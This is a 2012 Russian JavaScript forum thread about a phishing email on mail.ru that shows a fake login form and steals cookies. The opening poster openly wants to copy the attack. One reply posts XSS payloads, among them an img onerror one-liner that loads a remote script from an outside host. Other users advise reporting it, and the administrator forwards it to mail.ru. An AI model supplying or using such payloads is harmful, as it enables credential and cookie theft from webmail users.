Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 14.05.2012, 10:23
Интересующийся
Отправить личное сообщение для vagabunt Посмотреть профиль Найти все сообщения от vagabunt
 
Регистрация: 14.05.2012
Сообщений: 15

очень интересный фишинг
Здравствуйте, уважаемые.

Дело тут такое. Пришло вчера мне на почту письмо, (mail.ru)



с темой документы срочно. Открываю меня сразу перекидывает в папку входящие





Но я думаю глюк какой то. Через 30 секунд всплывает аут форма.



Форма отправляет данные на парсер, который находится на холмах. (hut.ru)


Я попытался сделать такую фичу самостоятельно. Вытащил html из тела письма. Но чет не получается.

Кто бы мне мог помочь в этом деле? Товарищи знатоки.

Спасибо за внимание)

Последний раз редактировалось B@rmaley.e><e, 14.05.2012 в 11:24. Причина: Скукожил картинку
Ответить с цитированием
  #2 (permalink)  
Старый 14.05.2012, 10:42
sinistral
Посмотреть профиль Найти все сообщения от melky
 
Регистрация: 28.03.2011
Сообщений: 5,418

картинки бы посжимать, а то вёрстка поехала ... ну да ладно

меня бы как пользователя, насторожило бы это



красненькой стрелочкой помечено что-то неведомое (ломание вёрстки, xss?)

красненьким овальчиком - это похоже на ajax spinner с facebook, что оно тут делает?

PS наконец то попробовал gimp 2.8
Ответить с цитированием
  #3 (permalink)  
Старый 14.05.2012, 11:08
Интересующийся
Отправить личное сообщение для vagabunt Посмотреть профиль Найти все сообщения от vagabunt
 
Регистрация: 14.05.2012
Сообщений: 15

Где изображение там это.



Ведет на js файл с этим содержанием.

http://zalil.ru/33232691

PS. Сюда скопировать не мог, так как превышает 10000 символов

А где красненький кружечек, там ничего особенного когда mail не может загрузить картинку он выдает
такую вот штучку

Последний раз редактировалось vagabunt, 14.05.2012 в 11:10.
Ответить с цитированием
  #4 (permalink)  
Старый 14.05.2012, 11:21
Интересующийся
Отправить личное сообщение для vagabunt Посмотреть профиль Найти все сообщения от vagabunt
 
Регистрация: 14.05.2012
Сообщений: 15

Мне собственно говоря, какой злоумышленники отправляют код)) Чтобы в страницу mail.ru впечатался так сказать свой java который через 30 секунд после открытия письма выдавал фишинговую форму прям на сайте)
Ответить с цитированием
  #5 (permalink)  
Старый 14.05.2012, 11:28
Аватар для B@rmaley.e><e
⊞ Развернуть
Отправить личное сообщение для B@rmaley.e><e Посмотреть профиль Найти все сообщения от B@rmaley.e><e
 
Регистрация: 11.01.2010
Сообщений: 1,810

Сообщение от vagabunt
Ведет на js файл с этим содержанием.

http://zalil.ru/33232691
А там, в свою очередь это: http://pastebin.com/YN5TriVm
Оно ещё и куки пытается стащить.

vagabunt, лучше сообщите об этом в техподдержку mail.ru
А ещё лучше — пользуйтесь GMail :-)
Ответить с цитированием
  #6 (permalink)  
Старый 14.05.2012, 11:36
Интересующийся
Отправить личное сообщение для vagabunt Посмотреть профиль Найти все сообщения от vagabunt
 
Регистрация: 14.05.2012
Сообщений: 15

Сообщение от B@rmaley.e><e Посмотреть сообщение
А там, в свою очередь это: http://pastebin.com/YN5TriVm
Оно ещё и куки пытается стащить.

vagabunt, лучше сообщите об этом в техподдержку mail.ru
А ещё лучше — пользуйтесь GMail :-)
Да я хочу сделать так же)) только вот не могу , не знаю что они шлют через свой сендер) какой скрипт)
Ответить с цитированием
  #7 (permalink)  
Старый 14.05.2012, 14:12
Новичок на форуме
Отправить личное сообщение для Kolyaj Посмотреть профиль Найти все сообщения от Kolyaj
 
Регистрация: 19.02.2008
Сообщений: 9,177

vagabunt,
а исходник письма можете показать?
Ответить с цитированием
  #8 (permalink)  
Старый 14.05.2012, 14:31
Аватар для Илья Кантор
Администратор
Отправить личное сообщение для Илья Кантор Посмотреть профиль Найти все сообщения от Илья Кантор
 
Регистрация: 25.05.2007
Сообщений: 1,221

Информация отправлена разработчикам Mail.ru
Надеюсь, топикстартер только за
Ответить с цитированием
  #9 (permalink)  
Старый 14.05.2012, 14:53
sinistral
Посмотреть профиль Найти все сообщения от melky
 
Регистрация: 28.03.2011
Сообщений: 5,418

Сообщение от vagabunt Посмотреть сообщение
Да я хочу сделать так же)) только вот не могу , не знаю что они шлют через свой сендер) какой скрипт)
обычная xss ... вот пример покруче
<img src onerror=alert('XSS')>

вместо alert'а можно подставить, что хочешь.

и кстати, скрипт можно было вставить короче :
<img src onerror=(a=document).body.appendChild(a.createElement('scr'+'ipt')).src='http://pastie.org/pastes/3909315/text';a.b;>


только вот вопрос.. как оно на mail.ru прошло?

Последний раз редактировалось melky, 14.05.2012 в 15:03.
Ответить с цитированием
  #10 (permalink)  
Старый 14.05.2012, 15:31
Интересующийся
Отправить личное сообщение для vagabunt Посмотреть профиль Найти все сообщения от vagabunt
 
Регистрация: 14.05.2012
Сообщений: 15

Сообщение от Илья Кантор Посмотреть сообщение
Информация отправлена разработчикам Mail.ru
Надеюсь, топикстартер только за
Вот топикстартер не фига не за

Топикустартеру интересно)) какой скрипт отсылают через сендер)
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
RegExp очень нужна рекурсия и ссылочность scuter Общие вопросы Javascript 9 18.08.2011 19:27
contentEditable — FAQ или очень простое руководство InetBUG Events/DOM/Window 1 16.02.2011 03:11
Очень интересный вопрос. CSS и JavaScript в одном флаконе. parzh-junior Элементы интерфейса 4 19.06.2010 20:15
Помогите пожалуйста, очень срочно!!! PAMAC AJAX и COMET 1 20.10.2009 23:38
помогите : селекты и инпут... очень нужно SandZ Events/DOM/Window 4 10.09.2009 14:22